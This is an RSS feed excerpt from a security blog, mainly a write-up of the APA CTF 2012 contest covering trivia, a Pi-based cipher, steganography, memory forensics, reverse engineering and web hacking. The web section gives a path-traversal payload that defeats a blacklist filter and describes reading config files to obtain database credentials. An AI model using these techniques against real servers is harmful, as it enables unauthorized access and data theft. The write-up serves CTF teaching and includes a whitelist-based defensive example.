						<span style="color: #000000; font-weight: bold;">self</span><span style="color: #339933;">::</span><span style="color: #000088;">$widgetInfo</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$variableName</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'file'</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">.</span><span style="color: #0000ff;">&quot;:&quot;</span><span style="color: #339933;">.</span><span style="color: #000000; font-weight: bold;">self</span><span style="color: #339933;">::</span><span style="color: #000088;">$widgetInfo</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$variableName</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'line'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
				<span style="color: #666666; font-style: italic;">//store this new widget information</span>
				<span style="color: #000000; font-weight: bold;">self</span><span style="color: #339933;">::</span><span style="color: #000088;">$widgetInfo</span><span style="color: #009900;">&#91;</span><span style="color: #000088;">$variableName</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">=</span><span style="color: #990000;">array</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;class&quot;</span><span style="color: #339933;">=&gt;</span><span style="color: #000088;">$classname</span><span style="color: #339933;">,</span><span style="color: #0000ff;">&quot;file&quot;</span><span style="color: #339933;">=&gt;</span><span style="color: #000088;">$file</span><span style="color: #339933;">,</span><span style="color: #0000ff;">&quot;line&quot;</span><span style="color: #339933;">=&gt;</span><span style="color: #000088;">$line</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
				<span style="color: #b1b100;">return</span> <span style="color: #000088;">$variableName</span><span style="color: #339933;">;</span>
			<span style="color: #009900;">&#125;</span>
		<span style="color: #009900;">&#125;</span>
	<span style="color: #009900;">&#125;</span>
	<span style="color: #666666; font-style: italic;">//this should not happen!</span>
	<span style="color: #b1b100;">throw</span> <span style="color: #000000; font-weight: bold;">new</span> Exception<span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;Could not find appropriate jWidget instantiation in <span style="color: #006699; font-weight: bold;">{$file}</span>:<span style="color: #006699; font-weight: bold;">{$line}</span> (Maybe you forgot to call parent::__construct(<span style="color: #000099; font-weight: bold;">\$</span>Parent) in your widget constructor?)&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span></pre></td></tr></table></div>



<p>
First, I know that this code could be optimized a lot; that is not the point here. Lines 3 to 10 are responsible for finding the caller, i.e. the file and the line where the class is instantiated. The file is fed to the tokenizer and the line is used in error messages. Lines 12 to 22 are described later.
</p><p>
Next we tokenize the PHP file and loop through the tokens until we find a T_NEW (new object) token. From there we go forward until we find the class name we are after (e.g. &#8220;jForm&#8221;). Since the same class may be instantiated many times in one file, we keep count of the instances (the counting of lines 12 to 22), so that for the n-th instance of a class we look for the n-th occurrence of &#8220;new thatClass()&#8221; in the file. Note that this ties every widget to a distinct assignment written out in the source: the same line executing twice, e.g. in a loop, would be the n-th instance at run time but only the first occurrence in the file.
</p><p>
When we find it, we walk back through the tokens looking for an assignment operator. If there is none, it is improper usage (e.g. something like $form1 = new jForm(); new jFormButton($form1);) and we throw an exception. The same goes if the token before the assignment operator is not a variable.
</p><p>
Finally we store the variable name, after checking that it is not already used by another widget (names are unique). If it is, the file and line where the other widget was defined are reported in the error.
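</p><p>
The token walk described above, as an added example that is not the post's jWidget code: it runs on a constructed PHP source string instead of the caller's file (the post gets that file from debug_backtrace()), and it leaves out the widget-name bookkeeping. jForm and jFormButton are the post's class names, used here only as strings; findAssignedVariable and the sample source are made up for this example.
</p>
```php
<?php
// Added example, not the post's library code: the token walk the post
// describes, run on a constructed source string instead of the caller's
// file. The post locates that file with debug_backtrace(); here $sample
// stands in for it so the script runs on its own. jForm and jFormButton
// are the post's widget class names, used only as strings.

function findAssignedVariable(string $source, string $className, int $occurrence = 1): string
{
    $tokens = token_get_all($source);
    $count  = count($tokens);
    $seen   = 0;

    for ($i = 0; $i < $count; $i++) {
        if (!is_array($tokens[$i]) || $tokens[$i][0] !== T_NEW) {
            continue;
        }
        // Forward over whitespace: the token after `new` must be our class.
        $k = $i + 1;
        while ($k < $count && is_array($tokens[$k]) && $tokens[$k][0] === T_WHITESPACE) {
            $k++;
        }
        if ($k >= $count || !is_array($tokens[$k]) || $tokens[$k][1] !== $className) {
            continue; // `new` of some other class
        }
        if (++$seen < $occurrence) {
            continue; // the n-th instance maps to the n-th textual occurrence
        }
        $line = $tokens[$i][2];

        // Backward over whitespace: the token before `new` must be `=`.
        $j = $i - 1;
        while ($j >= 0 && is_array($tokens[$j]) && $tokens[$j][0] === T_WHITESPACE) {
            $j--;
        }
        if ($j < 0 || $tokens[$j] !== '=') {
            throw new RuntimeException("new {$className} on line {$line} is not assigned to a variable");
        }
        // Backward again: the token before `=` must be a plain variable.
        $j--;
        while ($j >= 0 && is_array($tokens[$j]) && $tokens[$j][0] === T_WHITESPACE) {
            $j--;
        }
        if ($j < 0 || !is_array($tokens[$j]) || $tokens[$j][0] !== T_VARIABLE) {
            throw new RuntimeException("new {$className} on line {$line} is not assigned to a plain variable");
        }
        return substr($tokens[$j][1], 1); // drop the leading `$`
    }
    throw new RuntimeException("occurrence #{$occurrence} of new {$className} not found");
}

// Constructed sample: two proper instantiations, one widget passed straight
// into another constructor, and one assigned to a property instead of a variable.
$sample = <<<'PHP'
<?php
$loginForm = new jForm($this);
$other     = new jForm($this);
new jFormButton($loginForm);
$this->footer = new jForm($this);
PHP;

echo findAssignedVariable($sample, 'jForm', 1), "\n";
echo findAssignedVariable($sample, 'jForm', 2), "\n";
foreach ([['jFormButton', 1], ['jForm', 3]] as [$class, $n]) {
    try {
        findAssignedVariable($sample, $class, $n);
    } catch (RuntimeException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```
<p>
The first two calls resolve to loginForm and other; the jFormButton that is passed straight into a constructor and the jForm assigned to a property are both rejected, which are the two misuse cases the post's exceptions cover. Since the n-th run-time instance is mapped to the n-th textual occurrence, a line that executes twice (a loop, or a helper called from two places) cannot be resolved by this walk.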
</p><p>
The entire approach is straightforward and simple, but it provides for an elegant design. The same end is usually achieved by an intermediate compiler step (such as <a href='http://stackoverflow.com/questions/3588154/how-usable-is-qt-without-its-preprocessing-step'>MOC in Qt</a>), but because PHP is so dynamic, this meta-reflection can be done by a run-time code parser instead. I will let you know when the library is out, both as a part of jframework and as a stand-alone library.</p>]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/meta-reflection-variable-name-detection-problem-for-pull-widgets-in-php/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>APA CTF 2013 Write-up</title>
		<link>http://abiusx.com/apa-ctf-2013-write-up/</link>
		<comments>http://abiusx.com/apa-ctf-2013-write-up/#comments</comments>
		<pubDate>Sat, 15 Dec 2012 00:17:10 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[Computer]]></category>
		<category><![CDATA[English]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[AbiusX]]></category>
		<category><![CDATA[APA]]></category>
		<category><![CDATA[Brail Steganography]]></category>
		<category><![CDATA[CERT]]></category>
		<category><![CDATA[Classic Ciphers]]></category>
		<category><![CDATA[Cryptography]]></category>
		<category><![CDATA[CTF]]></category>
		<category><![CDATA[Entropy Analysis]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Information Entropy]]></category>
		<category><![CDATA[Pi Number]]></category>
		<category><![CDATA[Ransomware]]></category>
		<category><![CDATA[SAGE]]></category>
		<category><![CDATA[Straddling]]></category>
		<category><![CDATA[Volatility Forensics]]></category>
		<category><![CDATA[Web Hacking]]></category>
		<category><![CDATA[Whitelist Filtering]]></category>

		<guid isPermaLink="false">http://abiusx.com/?p=801</guid>
		<description><![CDATA[This post is about Sharif CERT (APA) center&#8217;s recent CTF (10 dec 2012), which is one of a kind in Iran. Most CTFs are a few days long since there are time-zone differences, but since this one is in Iran, its only a few hours long and full of pressure. Also it is fairly general [...]]]></description>
				<content:encoded><![CDATA[This post is about Sharif CERT (APA) center&#8217;s recent CTF (10 Dec 2012), which is one of a kind in Iran. Most CTFs are a few days long to accommodate time-zone differences, but since this one is held in Iran only, it is just a few hours long and full of pressure.

Also it is fairly general purpose, with Trivia, Web Hacking, Cryptography, Steganography, Reverse Engineering and Forensics among its genres. There&#8217;s also the final <a title="APA CTF online round scoreboard" href="http://ctf.cert.sharif.edu/">scoreboard</a> of the contest. As usual, team AbiusX nailed this CTF, though this was only the online round; the main round is held inside Sharif University of Technology in Tehran.

APA CTF usually pisses me off, as some questions are not technical and are more of a puzzle than a question &#8211; as you will see soon &#8211; and also because the guys in charge of writing the questions have very poor English (rofl). But it&#8217;s getting much better over the years and this version was perfectly acceptable, especially the part about giving different teams their own flags.

There were 2 trivia questions, 4 web flags, 2 reverse engineering flags and the rest each had one flag. Genre scores were 100 for trivia, 1200 for web, 200 for crypto, 600 for reverse engineering, 300 for steganography and 400 for forensics, plus bonuses for quick solvers.
<h1>The Questions</h1>
This section describes each question, its strengths and weaknesses, and its solution.

<span id="more-801"></span>
<h2>Trivia</h2>
The first trivia question was &#8220;<em>The tool that Microsoft uses to detect security vulnerabilities in its development.</em>&#8220;. The answer was of course <a title="Microsoft Sage" href="http://research.microsoft.com/en-us/um/people/pg/public_psfiles/sage-in-one-slide.pdf">SAGE</a> (which obviously we couldn&#8217;t figure out). In my 5 years of active OWASP involvement, Microsoft has been the leading company that benefits from OWASP research and development, without even admitting it. Many open source initiatives (like Mozilla) are reluctant to turn towards OWASP without some bragging.

Second trivia was &#8220;<em>Malware that asks for money to remove itself.</em>&#8220;. These are getting a place in malware world, and are known as <strong>ransomware</strong>.

&nbsp;
<h2>Cryptography</h2>
The cryptography challenge really crawled up my ass all the way up my brain, as it was a puzzle and not a cryptography challenge. You might know that I&#8217;m a crypto nerd, and I&#8217;m deeply into advanced number theory, information theory and everything cryptography. When you opened <a href="/archive/APACTF2013/c1.txt">the question link</a>, you would face this:
<div style="word-wrap: break-word;">14159265358979323846792643383279502884197169399375105820974944592307816406286208998628034825342551170679821480865132823066470938446095505822317253594081284811174502841027019385211055596446229489549303819644288109756659334461284756482337867831652712019091456485669234603486104543266482133936072602491412737245870066063155881748815209209628292540917153643678925903600113305305488204665213841469519415116094330572703657595919530921861173819326117931051185480744623799627495673518857527248912279381830119491298336733624406566430860213949463952247371907021798609437027705392171762931767523846748184676694051320005681271452635608277857713427577896091736371787214684409012249534301465495853710507922796892589235420199561121290219608640344181598136297747713099605187072113499999983729780491109510597317328160963185950244594553469083026425223082533446850352619311881710100031378387528865875332083814206171776691473035982534904287554687311595628638823537875937519577818577805321712268066130019278766111959092164201989380952572010654858632788659361533818279682303019520353018529689957736225994138912497217752834791315155748572424541506959508295331168617278558890750983817546374649393192550604009277016711390098488240128583616035637076601047101819429555961989467678374494482553797747268471040475346462080466842590694912933136770289891521047521620569660240580381501937051125338243003558764024749647326391419927260426992279678235478163600934172164121992458631503028618297455570674983850549458858692699569095227210797509302955321165344987202755960236480665499119881834797753566369807426542527862551818417574672890977772793800081647060016145249192173217214772350141441973568548161361157352552133475741849468438523323907394143334547762416862518983569485562099219222184272550254256887671790494114601653466804988627232791786085784383827967976681454100953883786360950680064225125205117392984896084128488626945604241965285029922106611863067442786220391949450471237137869609563643719165
7287467764657573962413890865832645995813390478027590099465764078951269468398352595</div>
Now, since there was no plaintext and no hint, this would either be a classic, easily breakable cipher, or some sort of encoding (which the APA guys generously confuse with encryption). Most <a href="http://en.wikipedia.org/wiki/Classical_cipher">classic ciphers</a> operate on alphabetic input and produce alphabetic output, except for a handful that work with digit coordinates (<a href="http://en.wikipedia.org/wiki/Polybius">Polybius</a>, <a href="http://en.wikipedia.org/wiki/Straddling_checkerboard#Straddling_checkerboard">Straddling checkerboard</a>, <a href="http://en.wikipedia.org/wiki/Bifid_cipher">Bifid</a>, etc.), and those produce a reduced digit set (i.e. not every digit appears in the output).

I quickly wrote some code to try every cipher I knew with numeric input/output on the digits above; all produced gibberish. Then I inspected the number for a while: it is 2046 characters long, which is 2x3x11x31, an odd combination of primes, so I laid the string out in grids along those factors (a 4-dimensional arrangement); still no sense.

Now I thought maybe it is a commonly known sequence, so I asked my friend Google about it, and it said no results (keep in mind that I copied the first 24 characters). Then I ran some analysis on the sequence using a bunch of tools, namely <a href="http://en.wikipedia.org/wiki/Index_of_coincidence">Index of Coincidence</a>, <a href="http://en.wikipedia.org/wiki/Frequency_analysis">Frequency Analysis</a> (up to 32 letters!) and finally <a href="http://en.wikipedia.org/wiki/Entropy_(information_theory)">Entropy Analysis</a>. Entropy analysis yielded high entropy, so the sequence was unlikely to be a classic cipher: classic ciphers have weak diffusion and confusion, so they do not raise the entropy of the plaintext much.

<strong>Side Note for Crypto Newbies:</strong> An ideal cipher is like a machine that receives a ball from you and outputs some dust; when you pour the dust back into the machine, it gives you the ball again. In more technical terms, it raises the information entropy of the output to the maximum, so the ciphertext looks like noise, yet there is a unique way (the key) of turning it back into something structured. In simple terms, if you zip maximum-entropy data (like something encrypted with AES), the zipped output is about the same size as the input, since there is no detectable pattern to compress.

But if the sequence was a new cipher, there would be no way to crack it, not without some plaintext, hints, or part of the key. So I just left the question be.

<strong>Solution. </strong>Later a hint popped up in the news section, saying 3.14. I thought they meant it was 3:14 and not much of the contest was left (I&#8217;m too much of a nerd). Later I figured out it&#8217;s 3.14 (the number Pi), then I searched around and found that this sequence is very similar to the decimal expansion of Pi. The digits of Pi have no detectable pattern, which explains the high entropy. Then I figured out that the sequence is not exactly Pi&#8217;s decimal part, so I wrote a quick script to list the differences, which were (they might&#8217;ve been different for other teams):

79 55 1 110 70 52 114 99 65

Now I concatenated these and entered the result as a flag, which was rejected. No hint was given to me on what else to do, so I assumed that the people in charge had made another mistake, removed the number &#8220;1&#8221; from the sequence, and then converted each remaining code to its ASCII character, which was the correct flag.

You might ask why the googling did not yield any result: it was because the 21st and 22nd digits were injected and are not part of Pi.
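
The difference-listing step, as an added example that is not the post's script: the first 100 decimals of Pi are embedded as a constant, and the observed string is constructed by splicing three ASCII codes into them (the real sequence would be read from the challenge file instead). It also handles the ambiguity the post ran into: when a spliced code begins with the digit Pi itself continues with, several placements of the run explain the same string, and only a human can tell which one is the flag. findInsertions, runCandidates and decodeCandidates are names chosen for this example.

```php
<?php
// Added example (not the post's code): recover ASCII codes spliced into the
// decimal expansion of pi, the trick behind the crypto flag. PI_DECIMALS is
// the first 100 decimals of pi; the observed string is constructed below by
// splicing three codes into it, so the script runs without any input file.

const PI_DECIMALS = '1415926535897932384626433832795028841971'
                  . '6939937510582097494459230781640628620899'
                  . '86280348253421170679';

// Walk observed and reference together. Where the observed digit stops
// matching, the extra digits are collected until a $window-digit probe of
// the reference reappears. Returns [start, end) offsets into $observed.
function findInsertions(string $observed, string $reference, int $window = 6): array
{
    $runs = [];
    $i = $j = 0;
    $n = strlen($reference);
    $m = strlen($observed);
    while ($i < $n && $j < $m) {
        if ($observed[$j] === $reference[$i]) {
            $i++;
            $j++;
            continue;
        }
        $probe = substr($reference, $i, $window);
        $start = $j;
        while ($j < $m && substr($observed, $j, $window) !== $probe) {
            $j++;
        }
        $runs[] = [$start, $j];
    }
    if ($j < $m) {
        $runs[] = [$j, $m]; // extra digits after the reference ran out
    }
    return $runs;
}

// A run whose digits overlap the reference is ambiguous: "342|110|1170679"
// and "3421|101|170679" describe the same string, and the greedy walk above
// always reports the rightmost placement. Slide the run left while the
// string stays identical and return every placement.
function runCandidates(string $observed, int $start, int $end): array
{
    $cands = [substr($observed, $start, $end - $start)];
    while ($start > 0 && $observed[$start - 1] === $observed[$end - 1]) {
        $start--;
        $end--;
        $cands[] = substr($observed, $start, $end - $start);
    }
    return $cands;
}

// Keep only the placements that read as printable ASCII.
function decodeCandidates(array $cands): array
{
    $out = [];
    foreach ($cands as $c) {
        $code = (int) $c;
        if ($code >= 32 && $code <= 126) {
            $out[] = chr($code);
        }
    }
    return $out;
}

// Constructed sample: 'H' (72) and 'i' (105) spliced at unambiguous spots,
// 'n' (110) spliced after "342", where pi itself continues with "11".
$observed = substr(PI_DECIMALS, 0, 20) . '72'
          . substr(PI_DECIMALS, 20, 20) . '105'
          . substr(PI_DECIMALS, 40, 53) . '110'
          . substr(PI_DECIMALS, 93);

foreach (findInsertions($observed, PI_DECIMALS) as [$start, $end]) {
    $cands = runCandidates($observed, $start, $end);
    printf("offset %3d  digits %-12s -> %s\n", $start, implode('|', $cands),
           implode('|', decodeCandidates($cands)) ?: '(not printable)');
}
```

For the sample, the runs at offsets 20 and 42 decode unambiguously to H and i, while the run spliced after 342 comes back as 011|101|110, of which 101 and 110 are both printable. That is the same effect that produced the stray 1 in the list above: a longer probe window reduces false resyncs, but the placement ambiguity is in the data, not in the tool.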
<h2>Steganography</h2>
The link to the question, provided you with an image:

<a href="http://abiusx.com/blog/wp-content/uploads/2012/12/a1.bmp"><img class="aligncenter size-medium wp-image-802" alt="APA CTF 2013 Stegano Image" src="http://abiusx.com/blog/wp-content/uploads/2012/12/a1.bmp" /></a>Initial analysis revealed that this is a 256 color Bitmap file. Since I wrote a few bitmap editors when I was around 12, I know that 256 color bitmaps carry a palette in their header listing the 2^8 colors used, each stored as a 24-bit RGB triple. I inspected the palette: no obvious pattern. I inspected the colors: no <a href="https://www.google.com/url?sa=t&amp;rct=j&amp;q=&amp;esrc=s&amp;source=web&amp;cd=1&amp;cad=rja&amp;ved=0CDQQFjAA&amp;url=http%3A%2F%2Fkoala.ece.stevens-tech.edu%2F~mouli%2Flsbsteg.pdf&amp;ei=3L7LUL7BAeik0AXi6IHQCw&amp;usg=AFQjCNFPXxyL-Ev0ytAmvBdYDARaex-BKA&amp;bvm=bv.1355325884,d.d2k">LSB</a> data. I ran every stegano tool I could find on the image; all failed.

Then there was a hint in the news section : &#8220;Focus on hot theme colors.&#8221;. What colors are deemed hot? Later I found out that they mean red variations. Then I filtered the image so that only red colors remain and all look alike. I looked deeply at the image, rotated it at every angle, and the only thing I could see was something similar to sport logos (the ones that show a man swimming or playing basketball in TV news programs).

<strong>Solution.</strong> We did not nail this particular question, as it had absolutely nothing to do with science or technique. It was Braille text converted to an image.

&nbsp;
<h2>Forensics</h2>
The question provided a <a href="/archive/APACTF2013/forensics/physical-memory-dump-1.7z">16 MB 7z file</a>, presumably a physical memory dump of a system. What we were supposed to find in it was yet another question never answered. <em><strong>The biggest problem with APA questions is that they do not clearly state what you should look for, though in real life you always know what end you&#8217;re pursuing.</strong></em>

When trying to decompress the file, the usual decompressors would complain that it is corrupt. Later I found out that it could only be unpacked by the 7-Zip software (namely the 7za executable, as I don&#8217;t live inside a Windows system). Now we had a 68 MB file, with no idea what to search for in it (68 MB is a little too much to eyeball).

Later a hint came up, telling us that it is intended to be inspected with the <a href="https://www.volatilesystems.com/default/volatility"><strong>Volatility</strong></a> framework. I obtained the software, which is written in Python. Running it required a bunch of libraries from Google Code; I fetched those too, and ran the tool. It has a huge number of plugins.

The image belonged to Windows XP SP3. The process list showed the usual Windows components, as well as two cmd.exe processes. Volatility can recover the commands typed into those cmd.exe consoles from the memory image, so I did that. They had renamed a <a href="/archive/APACTF2013/forensics/executable.792.exe">CTF3.exe</a> file to conhost.exe and run it.

I dumped the memory image of the conhost.exe process into a real file (executables are loaded into memory before being executed). Ran it on Windows:
<blockquote>&#8216;conhost&#8217; is not recognized as an internal or external command, operable program
or batch file.
Error reading registry key!</blockquote>
Inspecting the executable with a debugger revealed that it looks for the registry key &#8220;<strong>Keyboard Layouts\Preload</strong>&#8221; under HKLM. I checked that key on my own Windows machine, and nothing particular was there. Then I dumped the value of that key from inside the image file (the registry hives are mapped in memory too, so Volatility can read them from the dump), and the flag was there, fairly easy.

The problem was, why the hell would a forensics guy want to check up a stupid common registry key in some memory image?! The philosophy behind the question bugged me greatly.
<h2>Reverse Engineering</h2>
We were provided with <a title="APA CTF 2013 Reverse Engineering Challenge" href="/archive/APACTF2013/reverse-1.zip">this zip file</a>, which included a readme.txt, a reverse.exe and a libeay32.dll. Since I am an OpenSSL freak, I knew that libeay32.dll belongs to OpenSSL, so the program presumably uses AES, RSA, or some other nasty OpenSSL functionality (you would know what I mean if you had worked directly with OpenSSL&#8217;s code).

Readme.txt stated that <em>Executable is currently configured to generate flag2 for &#8220;SharifCERT&#8221;. You should generate and submit flag2 for &#8220;Team02&#8221;. </em>Inspecting the executable&#8217;s resources revealed a &#8220;SharifCERT&#8221; string among them. Replacing it with Team02 and running the program gave the first flag, which we got a few minutes after the beginning of the contest.

For the second flag, some anti-debugging features were built into the executable. Eventually it became obvious that it references some memory in libeay32.dll that is not there. After hours of headache, we figured out that the libeay32.dll shown in the debugger was actually a copy loaded by the operating system earlier, and not the one in the executable&#8217;s folder (for people unfamiliar with how Windows handles dynamic libraries: which copy of a same-named DLL ends up in the process depends on the loader&#8217;s search order, which is easy to get wrong).

Replacing it with the file from the folder revealed the second flag at that memory location.
<h2>Web Hacking</h2>
There were two web challenges: one with 3 flags and 1000 points, PHP/MySQL based, and one with 1 flag and 200 points, added for the sake of those newbies that can only hack ASPX. Unfortunately the second one had a bug which prevented our team from nailing it, as I&#8217;ll describe shortly.

The first challenge had the <strong><em>chase your own tail</em></strong> problem, which was frequent in the contest. You had no idea what they expected you to do, and you were faced with a vast web application, with really nasty code &#8211; very hard to keep in your head &#8211; and poor English text.

There were four initial pages, a homepage welcoming you, a css page which showed you a copy/pasted page, a downloads page which provided 3 links to download stuff, and a final page asking for email and password to login, with a link to another page asking for valid email to reset password.

The downloads page referenced a /includes/downloader.php file which accepted a GET parameter, namely file, containing the base64 encoding of the reversed filename. For example, to download css.html you had to base64-encode <em>lmth.ssc</em>. This code does exactly that:
<blockquote>&lt;?php die(base64_encode(strrev("filename.here")));</blockquote>
Unfortunately, the downloader script would not work with names containing .. or /, so no directory traversal and no LFI/<a href="http://en.wikipedia.org/wiki/Remote_file_inclusion">RFI</a>; it would just say &#8220;File not found&#8221;.

There was another interesting file mentioned in the css page, namely /includes/css-parser.php, which accepted raw GET data in the form:
<blockquote>css-parser.php?extension,filename1,filename2,&#8230;</blockquote>
and would dump the contents of filename1.php, filename2.php and the rest (if provided). Unfortunately, it only let you peek at files inside the /includes/ folder, as <a href="/archive/APACTF2013/web/includes/css-parser.php.txt">it had</a>:
<blockquote>$file = preg_replace('/[^a-zA-Z0-9\_\-\/]/', '', $file);
$output .= file_get_contents(dirname(__FILE__) . '/' . $file . '.' . $type) . "\n";</blockquote>
So, we took a look at <a href="/archive/APACTF2013/web/includes/downloader.php.txt">downloader.php</a>:
<blockquote>/**

FLAG: lol-first-key!.php

**/

$filename = $_REQUEST["file"];
$filename = strrev(base64_decode($filename));
$filename = str_replace('..', '', $filename);
$filename = str_replace('backups/', '', $filename);
$file = '../files/' . $filename;
if(file_exists($file) &amp;&amp; !is_link($file) &amp;&amp; !is_dir($file))</blockquote>
Now the first section, which states the flag file, was mistakenly typed as &#8220;FLAG: lol&#8221; when I first encountered this file. I was amazed at what it could mean, and they never told me. Later they fixed it, so I did not get the quick-solver&#8217;s bonus for this.

The code segment uses blacklist filtering, and if you&#8217;ve followed what I say in the <a title="OWASP PHP Security Cheat Sheet" href="https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet">OWASP PHP Security Cheat Sheet</a> (and any other security related article), you&#8217;re bound to be pwned if you use that. You should use <em>whitelist filtering</em>, i.e. only allowing what you know is safe, rather than filtering out what you know is unsafe. This code strips the double-dot and &#8220;backups/&#8221; strings, then prepends &#8220;../files/&#8221; to our input. That&#8217;s why a plain .. was useless and a slash on its own did not get us anywhere. Now pwning it is as simple as providing:
<blockquote>.backups/./index.php</blockquote>
First it strips double dots, none found; then it replaces our &#8220;backups/&#8221; with nothing, turning our input into &#8220;<strong>../index.php</strong>&#8220;. Stripping is not idempotent: each replacement can manufacture the very pattern an earlier replacement was supposed to remove, so a blacklist has to be re-applied until nothing changes at the very least, and even then it is no substitute for a whitelist. <a href="/archive/APACTF2013/web/index.php.txt">Index.php</a> had:
<blockquote>require_once '<a href="/archive/APACTF2013/web/includes/main.php.txt">includes/main.php</a>';

&#8230;</blockquote>
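
Back to the downloader.php filter, as an added example that is not the challenge code: blacklistResolve reproduces the two str_replace calls quoted above, and whitelistResolve is the whitelist-plus-realpath() check a practitioner would write instead; both run over the same inputs inside a throw-away directory the script creates (POSIX filesystem assumed, since it makes a symlink). The function names, the sandbox path and its files are all made up for the demo.

```php
<?php
// Added example, not the challenge's code: the blacklist from downloader.php
// (as quoted in the post) next to a whitelist-plus-realpath() version, both
// run on the same inputs. The sandbox directory, file names and the symlink
// are constructed here for the demo; it assumes a POSIX filesystem.

// The challenge's filter: strip '..' and 'backups/' once each, then prepend
// the download directory.
function blacklistResolve(string $filename): string
{
    $filename = str_replace('..', '', $filename);
    $filename = str_replace('backups/', '', $filename);
    return '../files/' . $filename;
}

// Whitelist: one path component of safe characters that does not start
// with a dot, then realpath() to make sure the resolved file (symlinks
// included) is still inside $base. Returns null for anything rejected.
function whitelistResolve(string $filename, string $base): ?string
{
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]*\z/', $filename)) {
        return null;
    }
    $root = realpath($base);
    $full = realpath($base . DIRECTORY_SEPARATOR . $filename);
    if ($root === false || $full === false) {
        return null;
    }
    if (strncmp($full, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $full;
}

// Constructed sandbox: $web/files/css.html is meant to be downloadable,
// $web/index.php is not, and $web/files/link.html is a symlink to it.
$web = sys_get_temp_dir() . '/downloader-demo-' . getmypid();
mkdir("$web/files", 0700, true);
file_put_contents("$web/files/css.html", 'body {}');
file_put_contents("$web/index.php", '<?php // not for download');
symlink("$web/index.php", "$web/files/link.html");

$inputs = ['css.html', '../index.php', '.backups/./index.php', 'link.html'];
foreach ($inputs as $in) {
    $wl = whitelistResolve($in, "$web/files");
    printf("%-22s blacklist: %-24s whitelist: %s\n",
           $in, blacklistResolve($in), $wl === null ? 'REJECTED' : $wl);
}

// Tidy up the sandbox.
foreach (["$web/files/link.html", "$web/files/css.html", "$web/index.php"] as $f) {
    unlink($f);
}
rmdir("$web/files");
rmdir($web);
```

The blacklist lets .backups/./index.php through as ../files/../index.php, whereas the whitelist rejects it on the character class alone. link.html is the reason for the realpath() step: it passes the character class but resolves outside the base directory, which is the case the challenge tried to cover with !is_link().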
Now the main.php file was interesting, but you couldn&#8217;t read it directly because it had the protection string on its first line. The trick was easy: simply request css-parser.php?php,downloader,/main so that you get the concatenated output of both files. Main.php referenced a bunch of useful files:
<blockquote>require_once '<a href="/archive/APACTF2013/web/includes/master.auth.php.txt">includes/master.auth.php</a>';
require_once '<a href="/archive/APACTF2013/web/mysql-config-files/config.inc.php.txt">mysql-config-files/config.inc.php</a>';
require_once '<a href="/archive/APACTF2013/web/mysql-config-files/config2.inc.php.txt">mysql-config-files/config2.inc.php</a>';
require_once 'classes/mysql.class.php';
require_once '<a href="/archive/APACTF2013/web/classes/auth.class.php.txt">classes/auth.class.php</a>';
require_once '<a href="/archive/APACTF2013/web/includes/password-recovery.php.txt">includes/password-recovery.php</a>';</blockquote>
Now the two interesting files were the MySQL config files. Hints in the news told us that the MySQL port was open to the world, so using the mysql client and the credentials in the file one could connect to the server, list emails and passwords, and even add an email and use the forgot-password feature, then log in with it and get the 3rd flag (500 points).

The second web challenge required you to use SQL injection on an ASPX server to get into admin.aspx, read some files via the admin panel and decrypt them to see the flag. Unfortunately the login screen had a bug which made it pop an error all the time, regardless of whether it was a wrong password or an actual error. I bypassed it using <a href="http://soroush.secproject.com/blog/2012/06/aspxerrorpath-in-url-technique-in-scanning-a-net-web-application/">Soroush&#8217;s ASPXERRORPATH technique</a> and also found admin.aspx myself (which didn&#8217;t require login), but since it was buggy, I left the question be. Again, nobody told me that it was fixed, so I never returned to it.
<h2>Conclusion</h2>
Generally, the contest was fairly straightforward and cool, and I and the rest of the participants liked it. APA needs better people on crypto and stegano challenge design, but it&#8217;s acceptable for now. Please drop comments with your ideas about this writeup and the contest in general.

<div id="attachment_814" class="wp-caption aligncenter" style="width: 310px"><a href="http://abiusx.com/blog/wp-content/uploads/2012/12/scoreboard.png"><img class="size-medium wp-image-814" alt="APA CTF 2013 Online Scoreboard" src="http://abiusx.com/blog/wp-content/uploads/2012/12/scoreboard-300x235.png" width="300" height="235" /></a><p class="wp-caption-text">APA CTF 2013 Online Scoreboard</p></div>]]></content:encoded>
			<wfw:commentRss>http://abiusx.com/apa-ctf-2013-write-up/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Migrating mail from one host to the other</title>
		<link>http://abiusx.com/migrating-mail-from-one-host-to-the-other/</link>
		<comments>http://abiusx.com/migrating-mail-from-one-host-to-the-other/#comments</comments>
		<pubDate>Wed, 31 Oct 2012 12:47:02 +0000</pubDate>
		<dc:creator>AbiusX</dc:creator>
				<category><![CDATA[Computer]]></category>
		<category><![CDATA[English]]></category>
		<category><![CDATA[Server Management]]></category>
		<category><![CDATA[fetchmail]]></category>
		<category><![CDATA[getmail]]></category>
		<category><![CDATA[Helm to Directadmin migration]]></category>
		<category><![CDATA[Helm to Directadmin transfer]]></category>
		<category><![CDATA[imap]]></category>
		<category><![CDATA[Maildir]]></category>
		<category><![CDATA[Mbox]]></category>
		<category><![CDATA[MDA]]></category>
		<category><![CDATA[MTA]]></category>
		<category><![CDATA[mutt]]></category>
		<category><![CDATA[pop3]]></category>
		<category><![CDATA[transfer database]]></category>
		<category><![CDATA[transfer email]]></category>
		<category><![CDATA[transfer files]]></category>
